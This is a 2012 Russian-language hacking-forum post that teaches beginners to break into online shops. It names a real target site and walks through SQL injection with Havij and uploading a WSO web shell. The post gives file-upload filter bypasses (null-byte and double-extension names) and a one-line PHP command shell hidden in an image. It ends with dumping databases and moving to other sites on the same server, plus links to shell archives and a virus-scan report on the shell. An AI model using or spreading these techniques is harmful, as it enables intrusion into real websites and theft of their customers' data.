1. По причине блокировки роскомнадзором раз в несколько месяцев мы меняем доменное имя. Чтоб не потерять новую ссылку просто зарегистрируйтесь и вы получите сообщение о замене на свою почту!
    Скрыть объявление
Скрыть объявление
По причине блокировки роскомнадзором раз в несколько месяцев мы меняем доменное имя. Чтоб не потерять новую ссылку просто зарегистрируйтесь и вы получите сообщение о замене на свою почту!
Скрыть объявление
Проводите сделки через Гарант-сервис чтоб полностью обезопасить свои покупки.

Шоп Sql-inject Шелл Дамп

Тема в разделе "Спам, ботнеты, кодинг, загрузки", создана пользователем .exe_cutoR, 19 ноя 2012.

  1. .exe_cutoR

    .exe_cutoR

    Сообщения:
    10
    Симпатии:
    0
    Баллы:
    1
    Один из примеров, как можно вскрыть шоп или любой другой сайт.
    Взят самый простой пример, чтобы начинающие смогли понять что к чему.

    Нам понадобится:

    1. Шелл WSO (в архиве с видео);
    2. Havij v 14

    Code:
    чttp://www.itsecteam.com/en/projects/project1.htm
    3. Браузер.

    Видео разбито на 4 части:

    1. Подготовка шелла;

    Code:
    http://www.sendspace.com/file/bfmc33
    2. Раскрутка SQL-inject при помощи Havij v 14;

    Code:
    http://www.sendspace.com/file/f6oa1p
    3. Заливка шелла;

    Code:
    http://www.sendspace.com/file/ow3cpu
    4. Дамп базы.

    Code:
    http://www.sendspace.com/file/lq0rvp
    Дополнения к видео:

    1. Подготовка шелла;

    Существует немалое количесиво шеллов от разных авторов, написанных на разных языках, примеры: shell.php,shell.asp,shell.jsp.
    B для каждого отдельного движка нужно подобрать свой шелл. Необязательно использовать только ВСО для php интерпритатора, можно использовать например: с100.php или с99.php. Стоит учитывать, что некоторые шеллы хорошо палятся антивирусами, поэтому не расстраивайтесь, если шелл залили, а по нужному адресу он отсутствует. Возможно его сразу удалил антивирус. Попробуйте залить другой шелл, если отсутствуют навыки программирования.
    Большое количество разных шеллов:

    Code:
    чttp://forum.k0d.cc/showthread.php?t=3471&page=1
    чttp://forum.hackzona.ru/forum-f17/eieeaeoey-oaeeia-t16848.html
    Или гугл в помощь.

    2. Раскрутка SQL-inject при помощи Havij v 14;

    SQL-инекция примечательна и до сих пор не теряет своей актуальности тем, что при написании скрипта для движка, программер не ввел достаточной фильтрации символов. Что и дает нам возможность осуществлять склеенные запросы к базам данных. Вот, например,

    Code:
    ttp://www.africantribalarts.net/pro_detail.php?Pid=128
    в параметр Pid нам не нужно было подставлять никаких других значений, чтобы обойти фильтр. Havij сделал все сам. Но я часто сталкиваюсь с Blind sql inject. Там приходится самому манипулировать параметрами, например подставлять спец. символы, такие как #,$,\". а уже потом раскручивать через софт.

    Сервис md5.rednoize.com в Havij v 14 на вкладке MD5 как подбирает хэш, так и шифрует слово/выражение в MD5. Т.е. работает в двухстороннем режиме.

    Чтобы вникнуть в SQL инъекции полностью. Рекомендую ознакомиться здесь:

    Code:
    чttp://injection.rulezz.ru/
    Прочтение тех статей позволит Вам понять суть и уже осмысленно анализировать скрипты на уязвимости даже в современных движках.

    Также для новичков настоятельно советую скачать мануал на русском языке "SQL-injection от А до Я":

    Code:
    http://www.sendspace.com/file/y139yl
    3. Заливка шелла;

    В моем примере я не сталкнулся с частой проблемой по заливке шелла, а именно разного рода фильтрациями.
    Но иногда Вам потребуется:

    * Ситуация без изменения содержимого шелла переименовываем шелл, например:

    Code:
    a) shell.php%00
    б) shell.php.wmv
    в) shell.php%00.jpg и др.
    * Заливаем картинку на сайт(в качестве аватара) и если имеется уязвимость типа php-including инклудим картинку и получаем шелл

    * Открыть любую картинку hex редактором и в конце файла вставить код шелла

    Code:
    <?php system($_GET["cmd"]); ?>
    Сохранить и залить.

    Такое еще встречается. Также есть способы по заливке шелла в комментариях картинки и др.

    4. Дамп базы.

    В моем примере права доступа на сервере настроены не привильно. Поэтому используя шелл, мы можем пройтись по другим сайтам на сервере и подключаться к их базам. Там еще есть шопы. Похожего типа.
    Чтобы найти остальные сайты на сервере или определить домены на любом другом сервере, можно воспользоваться сервисом "Сайты на одном IP" сайта

    Code:
    чttp://www.2ip.ru/
    Бывает, что функция дампа файла в шеллах не срабатывает, поэтому можно просто открыть таблицу для чтения и скопировать содержимое в буфер обмена, а потом вставить в блокнот на своем компьютере.

    Статья написана sergaj специально для к.про

    P.S. Не стесняйтесь задавать вопросы не только по примеру. Если ваш взлом имеет отношение к шеллам, SQL-инекциям, заливке шеллов или дампам баз, то задавайте. Т.к. это имеет непосредственное отношение к теме.

    Архив upload.rar тестился на сайте: [​IMG]

    ОТЧЕТ


    Code:
    SHA256: 9b2bba5d4beac03e7bd8843df2e830a47decbf9167535e29b21012f49f51aeb9
    File name: upload.rar
    Detection ratio: 13 / 43
    Analysis date: 2012-02-21 22:42:33 UTC ( 1 minute ago )
    0
    0
    Antivirus Result Update
    AhnLab-V3 - 20120221
    AntiVir PHP/Shell.G.2 20120221
    Antiy-AVL - 20120213
    Avast PHP:Shell-AX [Trj] 20120221
    AVG - 20120221
    BitDefender Trojan.Php.Backdoor.APF 20120221
    ByteHero - 20120221
    CAT-QuickHeal - 20120221
    ClamAV PHP.Shell-38 20120221
    Commtouch - 20120221
    Comodo - 20120221
    DrWeb - 20120221
    Emsisoft Backdoor.PHP.Shell!IK 20120221
    eSafe - 20120221
    eTrust-Vet - 20120221
    F-Prot - 20120221
    F-Secure Trojan.Php.Backdoor.APF 20120221
    Fortinet - 20120221
    GData Trojan.Php.Backdoor.APF 20120221
    Ikarus Backdoor.PHP.Shell 20120221
    Jiangmin Backdoor.PHP.aro 20120221
    K7AntiVirus - 20120221
    Kaspersky Backdoor.PHP.WebShell.ea 20120221
    McAfee - 20120221
    McAfee-GW-Edition - 20120221
    Microsoft Backdoor:pHP/Shell.G 20120221
    NOD32 PHP/WebShell.NAH 20120221
    Norman - 20120221
    nProtect Trojan.Php.Backdoor.APF 20120221
    Panda - 20120221
    PCTools - 20120221
    Prevx - 20120221
    Rising - 20120221
    Sophos - 20120221
    SUPERAntiSpyware - 20120206
    Symantec - 20120221
    TheHacker - 20120220
    TrendMicro - 20120221
    TrendMicro-HouseCal - 20120221
    VBA32 - 20120221
    VIPRE - 20120221
    ViRobot - 20120221
    VirusBuster - 20120221
    Скрины отчета:

    [​IMG]

    __________________________________________________ __________________________________________________ ___________
    [​IMG]

    Мысли Каспера на этот счет(баннеры-ссылки):

    [​IMG]

    Мысли Мелкософта на этот же счет:

    [​IMG]

    и ещё:

    [​IMG]

    Каждый для себя сделает свой вывод.

Поделиться этой страницей